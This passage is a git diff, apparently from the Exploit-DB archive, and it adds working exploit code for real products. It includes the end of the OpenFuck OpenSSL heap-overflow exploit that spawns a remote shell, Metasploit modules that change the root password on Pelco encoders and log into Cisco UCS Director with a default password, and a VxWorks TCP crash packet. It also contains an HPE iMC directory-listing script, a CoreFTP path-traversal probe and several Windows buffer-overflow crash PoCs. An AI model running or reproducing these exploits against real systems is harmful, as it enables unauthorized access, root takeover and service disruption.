+		printf("Server error: %s\n", ssl_error(ntohs(*(uint16_t*)&buf[1])));
+		exit(1);
+	}
+	if (len != 1 + CHALLENGE_LENGTH) {
+		printf("get server verify: Malformed packet size\n");
+		exit(1);
+	}
+	if (buf[0] != SSL2_MT_SERVER_VERIFY) {
+		printf("get server verify: Expected SSL2 MT SERVER VERIFY, got %x\n", (int)buf[0]);
+		exit(1);
+	}
+	if (memcmp(ssl->challenge, &buf[1], CHALLENGE_LENGTH)) {
+		printf("get server verify: Challenge strings don't match\n");
+		exit(1);
+	}
+}
+void send_client_finished(ssl_conn* ssl)
+{
+	unsigned char buf[BUFSIZE];
+	buf[0] = SSL2_MT_CLIENT_FINISHED;
+	memcpy(&buf[1], ssl->conn_id, ssl->conn_id_length);
+	send_ssl_packet(ssl, buf, 1+ssl->conn_id_length);
+}
+void get_server_finished(ssl_conn* ssl)
+{
+	unsigned char buf[BUFSIZE];
+	int len;
+	int i;
+	if (!(len = read_ssl_packet(ssl, buf, sizeof(buf)))) {
+		printf("Server error: %s\n", ssl_error(ntohs(*(uint16_t*)&buf[1])));
+		exit(1);
+	}
+	if (buf[0] != SSL2_MT_SERVER_FINISHED) {
+		printf("get server finished: Expected SSL2 MT SERVER FINISHED, got %x\n", (int)buf[0]);
+		exit(1);
+	}
+
+	if (len <= 112 /*17*/) {
+		printf("This server is not vulnerable to this attack.\n");
+		exit(1);
+	}
+	cipher = *(int*)&buf[101];
+	ciphers = *(int*)&buf[109];
+	printf("cipher: 0x%x   ciphers: 0x%x\n", cipher, ciphers);
+}
+void get_server_error(ssl_conn* ssl)
+{
+	unsigned char buf[BUFSIZE];
+	int len;
+
+	if ((len = read_ssl_packet(ssl, buf, sizeof(buf))) > 0) {
+		printf("get server finished: Expected SSL2 MT ERROR, got %x\n", (int)buf[0]);
+		exit(1);
+	}
+}
+void usage(char* argv0)
+{
+	int i;
+	printf(": Usage: %s target box [port] [-c N]\n\n", argv0);
+	printf("  target - supported box eg: 0x00\n");
+	printf("  box - hostname or IP address\n");
+	printf("  port - port for ssl connection\n");
+	printf("  -c open N connections. (use range 40-50 if u dont know)\n");
+	printf("  \n\n");
+	printf("  Supported OffSet:\n");
+
+	for (i=0; i<=MAX_ARCH; i++) {
+		printf("\t0x%02x - %s\n", i, architectures[i].desc);
+	}
+	printf("\nFuck to all guys who like use lamah ddos. Read SRC to have no surprise\n");
+
+	exit(1);
+}
+int main(int argc, char* argv[])
+{
+	char* host;
+	int port = 443;
+	int i;
+	int arch;
+	int N = 0;
+	ssl_conn* ssl1;
+	ssl_conn* ssl2;
+
+	printf("\n");
+	printf("*******************************************************************\n");
+	printf("* OpenFuck v3.0.4-root priv8 by SPABAM based on openssl-too-open *\n");
+	printf("*******************************************************************\n");
+        printf("* by SPABAM    with code of Spabam - LSD-pl - SolarEclipse - CORE *\n");
+        printf("* #hackarena  irc.brasnet.org                                     *\n");
+	printf("* TNX Xanthic USG #SilverLords #BloodBR #isotk #highsecure #uname *\n");
+	printf("* #ION #delirium #nitr0x #coder #root #endiabrad0s #NHC #TechTeam *\n");
+	printf("* #pinchadoresweb HiTechHate DigitalWrapperz P()W GAT ButtP!rateZ *\n");
+	printf("*******************************************************************\n");
+	printf("\n");
+	if ((argc < 3) || (argc > 6))
+		usage(argv[0]);
+	sscanf(argv[1], "0x%x", &arch);
+	if ((arch < 0) || (arch > MAX_ARCH))
+		usage(argv[0]);
+	host = argv[2];
+	if (argc == 4)
+		port = atoi(argv[3]);
+	else if (argc == 5) {
+		if (strcmp(argv[3], "-c"))
+			usage(argv[0]);
+		N = atoi(argv[4]);
+	}
+	else if (argc == 6) {
+		port = atoi(argv[3]);
+		if (strcmp(argv[4], "-c"))
+			usage(argv[0]);
+		N = atoi(argv[5]);
+	}
+	srand(0x31337);
+	for (i=0; i<N; i++) {
+		printf("\rConnection... %d of %d", i+1, N);
+		fflush(stdout);
+		connect_host(host, port);
+		usleep(100000);
+	}
+	if (N) printf("\n");
+	printf("Establishing SSL connection\n");
+	ssl1 = ssl_connect_host(host, port);
+	ssl2 = ssl_connect_host(host, port);
+	send_client_hello(ssl1);
+	get_server_hello(ssl1);
+	send_client_master_key(ssl1, overwrite_session_id_length, sizeof(overwrite_session_id_length)-1);
+	generate_session_keys(ssl1);
+	get_server_verify(ssl1);
+	send_client_finished(ssl1);
+	get_server_finished(ssl1);
+	printf("Ready to send shellcode\n");
+	port = get_local_port(ssl2->sock);
+	overwrite_next_chunk[FINDSCKPORTOFS] = (char) (port & 0xff);
+	overwrite_next_chunk[FINDSCKPORTOFS+1] = (char) ((port >> 8) & 0xff);
+	*(int*)&overwrite_next_chunk[156] = cipher;
+	*(int*)&overwrite_next_chunk[192] = architectures[arch].func_addr - 12;
+	*(int*)&overwrite_next_chunk[196] = ciphers + 16;	/* shellcode address */
+	send_client_hello(ssl2);
+	get_server_hello(ssl2);
+	send_client_master_key(ssl2, overwrite_next_chunk, sizeof(overwrite_next_chunk)-1);
+	generate_session_keys(ssl2);
+	get_server_verify(ssl2);
+	for (i = 0; i < ssl2->conn_id_length; i++) {
+		ssl2->conn_id[i] = (unsigned char) (rand() >> 24);
+	}
+	send_client_finished(ssl2);
+	get_server_error(ssl2);
+	printf("Spawning shell...\n");
+	sleep(1);
+	sh(ssl2->sock);
+	close(ssl2->sock);
+	close(ssl1->sock);
+	return 0;
+}
+/* spabam: It isn't 0day */
\ No newline at end of file
diff --git a/exploits/unix/remote/47186.rb b/exploits/unix/remote/47186.rb
new file mode 100755
index 000000000..2a7d817ca
--- /dev/null
+++ b/exploits/unix/remote/47186.rb
@@ -0,0 +1,160 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::Udp
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Auxiliary::Report
+  include Msf::Exploit::Remote::SSH
+
+  def initialize(info={})
+    super(update_info(info,
+      'Name'           => "Schneider Electric Pelco Endura NET55XX Encoder",
+      'Description'    => %q(
+        This module exploits inadequate access controls within the webUI to enable
+        the SSH service and change the root password. This module has been tested successfully
+        on: NET5501, NET5501-I, NET5501-XT, NET5504, NET5500, NET5516, NET550 versions.
+      ),
+      'License'        => MSF_LICENSE,
+      'Author'         =>
+        [
+          'Lucas Dinucci <idntk.lucdin@gmail.com>',
+          'Vitor Esperança <vitor@machiaveliclabs.com>'
+        ],
+      'References'     =>
+        [
+          ['CVE', '2019-6814'],
+          ['URL', 'https://www.schneider-electric.com/en/download/document/SEVD-2019-134-01/']
+        ],
+      'Payload'        =>
+        {
+          'Compat' => {
+            'PayloadType'    => 'cmd_interact',
+            'ConnectionType' => 'find'
+          }
+        },
+      'Platform'       => 'unix',
+      'Arch'           => ARCH_CMD,
+      'Targets'     => [ [ "Universal", {} ] ],
+      'Privileged'     => true,
+      'DisclosureDate' => "Jan 25 2019",
+      'DefaultTarget'  => 0))
+
+    register_options(
+      [
+        OptString.new('NEW_PASSWORD', [ true, 'New password to be set for the root account', Rex::Text.rand_text_alphanumeric(16)]),
+        OptInt.new('TIMEOUT', [ true, 'Timeout for the requests', 10])
+      ]
+    )
+
+    register_advanced_options(
+      [
+        OptInt.new('UDP_PORT', [ true, 'UDP port for the ONVIF service', 3702]),
+        OptBool.new('SSH_DEBUG', [ false, 'Enable SSH debugging output (Extreme verbosity!)', false]),
+        OptInt.new('SSH_TIMEOUT', [ false, 'Specify the maximum time to negotiate a SSH session', 30])
+      ]
+    )
+  end
+
+  def new_password
+    datastore['NEW_PASSWORD']
+  end
+
+  def check
+    xmlPayload = '<?xml version="1.0" encoding="UTF-8"?>'\
+                 '<Envelope xmlns="http://www.w3.org/2003/05/soap-envelope">'\
+                 '<Header xmlns:a="http://schemas.xmlsoap.org/ws/2004/08/addressing">'\
+                 '<a:Action mustUnderstand="1">http://schemas.xmlsoap.org/ws/2005/04/discovery/Probe</a:Action>'\
+                 '<a:MessageID>uuid:f3d577a3-431f-4450-ab45-b480042b9c74</a:MessageID>'\
+                 '<a:ReplyTo>'\
+                 '<a:Address>http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous</a:Address>'\
+                 '</a:ReplyTo>'\
+                 '<a:To mustUnderstand="1">urn:schemas-xmlsoap-org:ws:2005:04:discovery</a:To>'\
+                 '</Header>'\
+                 '<Body>'\
+                 '<Probe xmlns="http://schemas.xmlsoap.org/ws/2005/04/discovery">'\
+                 '<Types xmlns:dp0="http://www.onvif.org/ver10/network/wsdl">dp0:NetworkVideoTransmitter</Types>'\
+                 '</Probe>'\
+                 '</Body>'\
+                 '</Envelope><?xml version="1.0" encoding="UTF-8"?>'
+
+    connect_udp(true, {'RPORT' => datastore['UDP_PORT']})
+    udp_sock.put(xmlPayload)
+    resp = []
+    resp << udp_sock.get(datastore['TIMEOUT'])
+    xmlResponse = resp.join(',')
+    disconnect_udp
+    if xmlResponse.include?("NET5501") || xmlResponse.include?("NET5501-I") || xmlResponse.include?("NET5501-XT") || xmlResponse.include?("NET5504") || xmlResponse.include?("NET5500") || xmlResponse.include?("NET5516") || xmlResponse.include?("NET5508")
+      return Exploit::CheckCode::Appears
+    end
+     CheckCode::Safe
+  end
+
+  def change_password
+    print_status("#{peer} - Attempt to change the root password...")
+    post = {"enable": true, "passwd": new_password, "userid": "root"}.to_json
+
+    login = send_request_cgi({
+      'method' => 'POST',
+      'uri' =>  normalize_uri(target_uri.path, '/cgi-bin/webra.fcgi?network/ssh'),
+      'data' => post,
+      'headers' =>
+      {
+        'Cookie'        => 'live_onoff=0; userid=admin; grpid=ADMIN; permission=2147483647',
+        'Content-Type'  => 'application/json;charset=utf-8'
+      }
+    }, timeout=datastore['TIMEOUT'])
+
+    fail_with(Failure::UnexpectedReply, "Failed to change root password") unless login && login.code == 200
+    print_good("#{rhost}:80 - Successfully changed the root password...")
+    print_good("#{rhost}:80 - New credentials: User: root / Password: #{new_password}")
+  end
+
+  def do_login
+    change_password
+    print_status("#{rhost}:22 - Attempt to start a SSH connection...")
+    factory = ssh_socket_factory
+    opts = {
+      :auth_methods    => ['password', 'keyboard-interactive'],
+      :port            => 22,
+      :use_agent       => false,
+      :config          => true,
+      :password        => new_password,
+      :proxy           => factory,
+      :non_interactive => true,
+      :verify_host_key => :never
+    }
+    opts.merge!(:verbose => :debug) if datastore['SSH_DEBUG']
+    begin
+      ssh = nil
+      ::Timeout.timeout(datastore['SSH_TIMEOUT']) do
+        ssh = Net::SSH.start(datastore['RHOST'], 'root', opts)
+      end
+    rescue Rex::ConnectionError
+    rescue Net::SSH::Disconnect, ::EOFError
+      print_error "#{rhost}:22 SSH - Disconnected during negotiation"
+    rescue ::Timeout::Error
+      print_error "#{rhost}:22 SSH - Timed out during negotiation"
+    rescue Net::SSH::AuthenticationFailed
+      print_error "#{rhost}:22 SSH - Failed authentication"
+    rescue Net::SSH::Exception => e
+      print_error "#{rhost}:22 SSH Error: #{e.class} : #{e.message}"
+    end
+    if ssh
+      conn = Net::SSH::CommandStream.new(ssh)
+      return conn
+    end
+  end
+
+  def exploit
+    conn = do_login
+    if conn
+      print_good("#{rhost}:22 - Session established ")
+      handler(conn.lsock)
+    end
+  end
+end
\ No newline at end of file
diff --git a/exploits/unix/remote/47346.rb b/exploits/unix/remote/47346.rb
new file mode 100755
index 000000000..3266e3206
--- /dev/null
+++ b/exploits/unix/remote/47346.rb
@@ -0,0 +1,139 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'net/ssh'
+require 'net/ssh/command_stream'
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::SSH
+
+  def initialize(info={})
+    super(update_info(info,
+      'Name'           => "Cisco UCS Director default scpuser password",
+      'Description'    => %q{
+        This module abuses a known default password on Cisco UCS Director. The 'scpuser'
+        has the password of 'scpuser', and allows an attacker to login to the virtual appliance
+        via SSH.
+        This module  has been tested with Cisco UCS Director virtual machines 6.6.0 and 6.7.0.
+        Note that Cisco also mentions in their advisory that their IMC Supervisor and
+        UCS Director Express are also affected by these vulnerabilities, but this module
+        was not tested with those products.
+      },
+      'License'        => MSF_LICENSE,
+      'Author'         =>
+        [
+          'Pedro Ribeiro <pedrib[at]gmail.com>'        # Vulnerability discovery and Metasploit module
+        ],
+      'References'     =>
+        [
+          [ 'CVE', '2019-1935' ],
+          [ 'URL', 'https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190821-imcs-usercred' ],
+          [ 'URL', 'https://seclists.org/fulldisclosure/2019/Aug/36' ],
+          [ 'URL', 'https://raw.githubusercontent.com/pedrib/PoC/master/advisories/cisco-ucs-rce.txt' ]
+        ],
+      'DefaultOptions'  =>
+        {
+          'EXITFUNC' => 'thread'
+        },
+      'Payload'        =>
+        {
+          'Compat' => {
+            'PayloadType'    => 'cmd_interact',
+            'ConnectionType' => 'find'
+          }
+        },
+      'Platform'       => 'unix',
+      'Arch'           => ARCH_CMD,
+      'Targets'        =>
+        [
+          [ 'Cisco UCS Director < 6.7.2.0', {} ],
+        ],
+      'Privileged'     => false,
+      'DefaultTarget'  => 0,
+      'DisclosureDate' => 'Aug 21 2019'
+    ))
+
+    register_options(
+      [
+        Opt::RPORT(22),
+        OptString.new('USERNAME', [true,  "Username to login with", 'scpuser']),
+        OptString.new('PASSWORD', [true,  "Password to login with", 'scpuser']),
+      ], self.class
+    )
+
+    register_advanced_options(
+      [
+        OptBool.new('SSH_DEBUG', [false, 'Enable SSH debugging output (Extreme verbosity!)', false]),
+        OptInt.new('SSH_TIMEOUT', [false, 'Specify the maximum time to negotiate a SSH session', 30])
+      ]
+    )
+  end
+
+  def rhost
+    datastore['RHOST']
+  end
+
+  def rport
+    datastore['RPORT']
+  end
+
+  def do_login(user, pass)
+    factory = ssh_socket_factory
+    opts = {
+      :auth_methods    => ['password', 'keyboard-interactive'],
+      :port            => rport,
+      :use_agent       => false,
+      :config          => false,
+      :password        => pass,
+      :proxy           => factory,
+      :non_interactive => true,
+      :verify_host_key => :never
+    }
+
+    opts.merge!(:verbose => :debug) if datastore['SSH_DEBUG']
+
+    begin
+      ssh = nil
+      ::Timeout.timeout(datastore['SSH_TIMEOUT']) do
+        ssh = Net::SSH.start(rhost, user, opts)
+      end
+    rescue Rex::ConnectionError
+      return
+    rescue Net::SSH::Disconnect, ::EOFError
+      print_error "#{rhost}:#{rport} SSH - Disconnected during negotiation"
+      return
+    rescue ::Timeout::Error
+      print_error "#{rhost}:#{rport} SSH - Timed out during negotiation"
+      return
+    rescue Net::SSH::AuthenticationFailed
+      print_error "#{rhost}:#{rport} SSH - Failed authentication"
+    rescue Net::SSH::Exception => e
+      print_error "#{rhost}:#{rport} SSH Error: #{e.class} : #{e.message}"
+      return
+    end
+
+    if ssh
+      conn = Net::SSH::CommandStream.new(ssh)
+      ssh = nil
+      return conn
+    end
+
+    return nil
+  end
+
+  def exploit
+    user = datastore['USERNAME']
+    pass = datastore['PASSWORD']
+
+    print_status("#{rhost}:#{rport} - Attempt to login to the Cisco appliance...")
+    conn = do_login(user, pass)
+    if conn
+      print_good("#{rhost}:#{rport} - Login Successful (#{user}:#{pass})")
+      handler(conn.lsock)
+    end
+  end
+end
\ No newline at end of file
diff --git a/exploits/unix/remote/764.c b/exploits/unix/remote/764.c
index 595a9f2b6..4931ca1e2 100644
--- a/exploits/unix/remote/764.c
+++ b/exploits/unix/remote/764.c
@@ -1,4 +1,5 @@
 /*
+ * E-DB Note: Updated exploit ~ https://www.exploit-db.com/exploits/47080
  * E-DB Note: Updating OpenFuck Exploit ~ http://paulsec.github.io/blog/2014/04/14/updating-openfuck-exploit/
  *
  * OF version r00t VERY PRIV8 spabam
diff --git a/exploits/vxworks/dos/47233.py b/exploits/vxworks/dos/47233.py
new file mode 100755
index 000000000..2c167edc2
--- /dev/null
+++ b/exploits/vxworks/dos/47233.py
@@ -0,0 +1,28 @@
+# Exploit Title: VxWorks TCP Urgent pointer = 0 integer underflow vulnerability
+# Discovered By: Armis Security
+# PoC Author: Zhou Yu (twitter: @504137480)
+# Vendor Homepage: https://www.windriver.com
+# Tested on: VxWorks 6.8
+# CVE: CVE-2019-12255
+# More Details: https://github.com/dazhouzhou/vxworks-poc/tree/master/CVE-2019-12255
+# The PoC can crash VxWorks tasks(set the port corresponding to the task in the PoC), such as telnet, ftp, etc.
+
+from scapy.all import *
+
+if __name__ == "__main__":
+    ip = "192.168.10.199"
+    dport = 23
+    seq_num = 1000
+    payload = "\x42"*2000
+    sport = random.randint(1024,65535)
+
+    syn = IP(dst = ip)/TCP(sport = sport , dport = dport ,flags = "S", seq=seq_num)
+    syn_ack = sr1(syn)
+
+    seq_num = seq_num + 1
+    ack_num = syn_ack.seq+1
+    ack = IP(dst = ip)/TCP(sport = sport , dport = dport ,flags = "A", seq=seq_num, ack=ack_num)
+    send(ack)
+
+    psh = IP(dst = ip)/TCP(sport = sport , dport = dport ,flags = "PAU", seq=seq_num, ack=ack_num, urgptr=0) / payload
+    send(psh)
\ No newline at end of file
diff --git a/exploits/watchos/dos/47158.txt b/exploits/watchos/dos/47158.txt
new file mode 100644
index 000000000..f6c1bba6e
--- /dev/null
+++ b/exploits/watchos/dos/47158.txt
@@ -0,0 +1,18 @@
+The digital touch iMessage extension can read out of bounds if a malformed Tap message contains a color array that is shorter than the points array and delta array. The method [ETTapMessage initWithArchiveData:] checks that the points array is twice as long as the deltas array, but only checks that the colors array is longer than eight bytes, even though a color is needed for every point-delta pair that is processed.
+
+To reproduce the issue with the files in tapcrash.zip:
+
+1) install frida (pip3 install frida)
+2) open sendMessage.py, and replace the sample receiver with the phone number or email of the target device
+3) in injectMessage.js replace the marker "FULL PATH" with the path of the obj file
+4) in the local directory, run:
+
+python3 sendMessage.py
+
+This will lead to a crash in SpringBoard requiring no user interaction.
+
+I've also attached a crash dump and ETencode.m, which is the file that was used to generate the obj file.
+
+
+Proof of Concept:
+https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47158.zip
\ No newline at end of file
diff --git a/exploits/watchos/remote/47408.py b/exploits/watchos/remote/47408.py
new file mode 100755
index 000000000..0a7046a09
--- /dev/null
+++ b/exploits/watchos/remote/47408.py
@@ -0,0 +1,88 @@
+#!/opt/local/bin/python2.7
+
+# Exploit Title: HPE Intelligent Management Center dbman Command 10001 Information Disclosure
+# Date: 22-09-2019
+# Exploit Author: Rishabh Sharma (Linkedin: rishabh2241991)
+# Vendor Homepage: www.hpe.com
+# Software Link: https://h10145.www1.hpe.com/Downloads/DownloadSoftware.aspx?SoftwareReleaseUId=16759&ProductNumber=JG747AAE&lang=en&cc=us&prodSeriesId=4176535&SaidNumber=
+# Tested on Version: iMC_PLAT_7.1_E0302_Standard_Windows and iMC_PLAT_7.2_E0403_Std_Win
+# Tested on: Windows 7
+# CVE : CVE-2019-5392
+# Conversion of Nessus Plugin to Python Exploit
+# Nessus Plugin Name: hp_imc_dbman_cmd_10001_info_disclosure.nasl
+# Description: This vulnerability allow remote attacker to view the contents of arbitrary directories under the security context of the SYSTEM or root user.
+# See Also: https://www.tenable.com/plugins/nessus/118038
+
+from pyasn1.type.univ import *
+from pyasn1.type.namedtype import *
+from pyasn1.codec.ber import encoder
+import struct
+import binascii
+import socket, sys
+import sys
+import re
+
+if len(sys.argv) != 4:
+    print "USAGE: python %s <ip> <port> <directory>" % (sys.argv[0])
+    sys.exit(1)
+else:
+    ip = sys.argv[1]
+    port = int(sys.argv[2]) # Default Port 2810
+    directory = sys.argv[3]
+    payload = directory.replace("\\","\\\\") 
+    opcode = 10001
+
+try:
+    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+    print "Socket Created.."
+except socket.error:
+	print 'Failed to create socket'
+	sys.exit()
+victim_address = (ip,port)
+print('connecting to {} port {}'.format(*victim_address))
+sock.connect((ip, port))
+
+class DbmanMsg(Sequence):
+    componentType = NamedTypes(
+        NamedType('flag', Integer()),
+        NamedType('dir', OctetString())
+    )
+
+data = DbmanMsg()
+data['flag'] = 1
+data['dir'] = payload
+encodeddata = encoder.encode(data, defMode=False)
+dataLen = len(encodeddata)
+values = (opcode, dataLen, encodeddata)
+s = struct.Struct(">ii%ds" % dataLen)
+packed_data = s.pack(*values)
+print 'Format string  :', s.format
+print 'Uses           :',s.size, 'bytes'
+print 'Packed Value   :', binascii.hexlify(packed_data)
+print '\n'
+print 'Sending Payload...'
+sock.send(packed_data)
+BUFF_SIZE = 4000
+res = sock.recv(BUFF_SIZE)
+rec =  len(res)
+if (rec == 0):
+	print "No data in the directory"
+else:
+        print "Data Recived: "+str(rec)
+	a = repr(res)
+	b = a
+	b = re.sub(r'(x\d\d)', '', b)
+	b = re.sub(r'(\\x[\d].)', '', b)
+	b = re.sub(r'(\\x..)', '', b)
+	replacestring = ['"','\\n','\\r','\\t','0']
+	print "Data in "+payload+" Directory: \n"
+	for r in replacestring:
+		b = b.replace(r,'')
+	b = b.replace("'","")
+	#print b #Remove '#' if output results is not proper
+	matches = re.finditer(r"([\\]*)([.[a-zA-Z\d\s]*)", b, re.MULTILINE)
+	for matchNum, match in enumerate(matches, start=1):
+                
+		print match.group(2)
+print "Done..."
+sock.close()
\ No newline at end of file
diff --git a/exploits/windows/dos/46535.txt b/exploits/windows/dos/46535.txt
index 54b14f20a..e3d5ef16b 100644
--- a/exploits/windows/dos/46535.txt
+++ b/exploits/windows/dos/46535.txt
@@ -1,6 +1,6 @@
 # Exploit Title: CoreFTP Server FTP / SFTP Server v2 - Build 674  SIZE Directory Traversal
 # Google Dork: N/A
-# Date: 3/13/2019
+# Date: 4/27/2019
 # Exploit Author: Kevin Randall
 # Vendor Homepage: https://www.coreftp.com
 # Software Link: http://www.coreftp.com/server/index.html
@@ -8,34 +8,78 @@
 # Tested on: Windows 7
 # CVE : CVE-2019-9648
 
-*Vendor has confirmed vulnerability and implemented an updated version*
 
-Summary: By utilizing a directory traversal along with the FTP SIZE command, an attacker can browse outside the root directory to determine if a file exists based on return file size by using a ..\..\ technique
-Tools used:
-Parrot OS VM
-Windows 7 VM
-FTP / SFTP Server v2 - Build 674
-Netcat
+#!/usr/bin/python
 
-Proof of Concept (PoC):
+import socket
+import sys
 
-File 1: ARP.exe
-Type of file: Application(.EXE)
-Description: TCP/IP Arp Command
-Location: C:\Windows\System32\
-Size: 20.5 KB (20,992 bytes)
-Size on disk: 24.0 KB (24,576 bytes)
-Created: Monday July 13, 2009 7:55:11 PM
-Modified: Monday July 13, 2009, 9:14:12 PM
-Accessed: Monday July 13, 2009 7:55:11 PM
+########################################################
+###########Set Variables For Script Here################
 
-#nc -nv 192.168.0.2 21
-(UNKNOWN) [192.168.0.2] 21 (ftp) open
-220 Core FTP Server Version 2.0, build 674, 32-bit, installed 1 days ago Unregistered
-USER anonymous
-331 password required for anonymous
-PASS anonymous@
-230-Logged on
-230
-SIZE C:\..\..\..\..\..\..\Windows\System32\ARP.exe
-213 20992
\ No newline at end of file
+file_to_look_for = "nslookup.exe"
+local_disk_drive = " C:"
+path_traversal = "\..\..\..\..\..\Windows\System32\\"
+
+########################################################
+print ("""
+         #####  #     # #######        #####    ###     #    #####         #####   #####  #        #####
+         #     # #     # #             #     #  #   #   ##   #     #       #     # #     # #    #  #     #
+         #       #     # #                   # #     # # #   #     #       #     # #       #    #  #     #
+         #       #     # #####   #####  #####  #     #   #    ###### #####  ###### ######  #    #   #####
+         #        #   #  #             #       #     #   #         #             # #     # ####### #     #
+         #     #   # #   #             #        #   #    #   #     #       #     # #     #      #  #     #
+          #####     #    #######       #######   ###   #####  #####         #####   #####       #   #####
+
+          #######
+          #       #    # #####  #       ####  # #####
+          #        #  #  #    # #      #    # #   #
+          #####     ##   #    # #      #    # #   #
+          #         ##   #####  #      #    # #   #
+          #        #  #  #      #      #    # #   #
+          ####### #    # #      ######  ####  #   #
+
+          #     #                                       ######         #     #    #
+          #  #  # #####  # ##### ##### ###### #    #    #     # #   # ###    #   #  ###### #    # # #    #
+          #  #  # #    # #   #     #   #      ##   #    #     #  # #   #     #  #   #      #    # # ##   #
+          #  #  # #    # #   #     #   #####  # #  #    ######    #          ###    #####  #    # # # #  #
+          #  #  # #####  #   #     #   #      #  # #    #     #   #    #     #  #   #      #    # # #  # #
+          #  #  # #   #  #   #     #   #      #   ##    #     #   #   ###    #   #  #       #  #  # #   ##
+           ## ##  #    # #   #     #   ###### #    #    ######    #    #     #    # ######   ##   # #    #
+
+           ######
+           #     #   ##   #    # #####    ##   #      #
+           #     #  #  #  ##   # #    #  #  #  #      #
+           ######  #    # # #  # #    # #    # #      #
+           #   #   ###### #  # # #    # ###### #      #
+           #    #  #    # #   ## #    # #    # #      #
+           #     # #    # #    # #####  #    # ###### ######
+
+           """)
+s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
+connect = s.connect(('192.168.0.4',21))
+
+s.recv(1024)
+s.send('USER anonymous\r\n')
+
+s.recv(1024)
+s.send('PASS anonymous\r\n')
+
+s.recv(1024)
+s.recv(1024)
+s.send('SIZE' +local_disk_drive+path_traversal+file_to_look_for + '\r\n')
+result = s.recv(2048)
+trimmedoutput = result.strip()
+splitoutput = trimmedoutput.split(' ')
+realresult = unicode (trimmedoutput,'utf-8')
+realresult2 = unicode (splitoutput[1],'utf-8')
+isnum = realresult.isnumeric()
+isnum2 = realresult2.isnumeric()
+if isnum2:
+    print "The file " + file_to_look_for + " exist on the remote server. Here is the filesize:" + splitoutput[1]
+else:
+    print "The file " + file_to_look_for + " does not exist on the remote server or one of the variables declared is incorrect."
+
+s.send('QUIT\r\n')
+
+s.close
\ No newline at end of file
diff --git a/exploits/windows/dos/46656.py b/exploits/windows/dos/46656.py
new file mode 100755
index 000000000..3db9ecef6
--- /dev/null
+++ b/exploits/windows/dos/46656.py
@@ -0,0 +1,23 @@
+# -*- coding: utf-8 -*-
+# Exploit Title: Magic Iso Maker 5.5(build 281) - "Serial Code" Denial of Service (PoC)
+# Date: 03/04/2019
+# Author: Alejandra Sánchez
+# Vendor Homepage: http://www.magiciso.com
+# Software Link: http://www.magiciso.com/Setup_MagicISO.exe
+# Version: 5.5(build 281)
+# Tested on: Windows 10
+
+# Proof of Concept:
+# 1.- Run the python script "MagicIso.py", it will create a new file "MagicIso.txt"
+# 2.- Copy the text from the generated MagicIso.txt file to clipboard
+# 3.- Open MagicISO.exe
+# 4.- Go to Register
+# 5.- Write any name in the field "User Name", e.g "Anonymous"
+# 6.- Paste clipboard in the field "Serial Code"
+# 7.- Click on button -> Register!
+# 8.- Crashed
+
+buffer = "\x41" * 5000
+f = open ("MagicIso.txt", "w")
+f.write(buffer)
+f.close()
\ No newline at end of file
diff --git a/exploits/windows/dos/46702.py b/exploits/windows/dos/46702.py
new file mode 100755
index 000000000..e417e3d9b
--- /dev/null
+++ b/exploits/windows/dos/46702.py
@@ -0,0 +1,21 @@
+#Exploit Title: UltraVNC Viewer 1.2.2.4 - Denial of Service (PoC)
+#Discovery by: Victor Mondragón
+#Discovery Date: 2019-04-14
+#Vendor Homepage: https://www.uvnc.com/
+#Software Link: https://www.uvnc.com/downloads/ultravnc/126-download-ultravnc-1224.html
+#Tested Version: 1.2.2.4
+#Tested on: Windows 7 x64 Service Pack 1
+
+#Steps to produce the crash:
+#1.- Run python code: UltraVNC_Viewer_1.2.2.4.py
+#2.- Open UltraViewer.txt and copy content to clipboard
+#3.- Open UltraVNC Viewer 
+#4.- In "VNC Server" Paste Clipboard
+#5.- Click on "Connect"
+#6.- Crashed
+
+cod = "\x41" * 256
+
+f = open('UltraViewer.txt', 'w')
+f.write(cod)
+f.close()
\ No newline at end of file
diff --git a/exploits/windows/dos/46703.py b/exploits/windows/dos/46703.py
new file mode 100755
index 000000000..a63ec6e36
--- /dev/null
+++ b/exploits/windows/dos/46703.py
@@ -0,0 +1,22 @@
+#Exploit Title: UltraVNC Launcher 1.2.2.4 - Denial of Service (PoC)
+#Discovery by: Victor Mondragón
+#Discovery Date: 2019-04-14
+#Vendor Homepage: https://www.uvnc.com/
+#Software Link: https://www.uvnc.com/downloads/ultravnc/126-download-ultravnc-1224.html
+#Tested Version: 1.2.2.4
+#Tested on: Windows 7 x64 Service Pack 1
+
+#Steps to produce the crash:
+#1.- Run python code: UltraVNC_Launcher_1.2.2.4.py
+#2.- Open UltraLauncher.txt and copy content to clipboard
+#3.- Open UltraVNC Launcher
+#4.- Select "Properties"
+#5.- In "Path vncviewer.exe" Paste Clipboard
+#6.- Click on "OK"
+#7.- Crashed
+
+cod = "\x41" * 300
+
+f = open('UltraLauncher.txt', 'w')
+f.write(cod)
+f.close()
\ No newline at end of file
diff --git a/exploits/windows/dos/46708.py b/exploits/windows/dos/46708.py
new file mode 100755
index 000000000..bac6e026e
--- /dev/null
+++ b/exploits/windows/dos/46708.py
@@ -0,0 +1,22 @@
+# -*- coding: utf-8 -*-
+# Exploit Title: PCHelpWareV2 1.0.0.5 - 'SC' Denial of Service (PoC)
+# Date: 15/04/2019
+# Author: Alejandra Sánchez
+# Vendor Homepage: https://www.uvnc.com/home.html
+# Software Link: http://www.uvnc.eu/download/pchw2/PCHelpWareV2.msi
+# Version: 1.0.0.5
+# Tested on: Windows 10
+
+# Proof of Concept:
+# 1.- Run the python script "PCHelpWareV2_create_.py", it will create a image "exploit.bmp"
+# 2.- Open PCHelpWareV2 Viewer
+# 3.- Go to Tools -> Create SC
+# 4.- Click on button -> Browse (any "Browse" button), and select the 'exploit.bmp' image created
+# 5.- Click on button -> Create SC
+# 6.- Crashed
+
+buffer = "\x41" * 10000
+
+f = open ("exploit.bmp", "w")
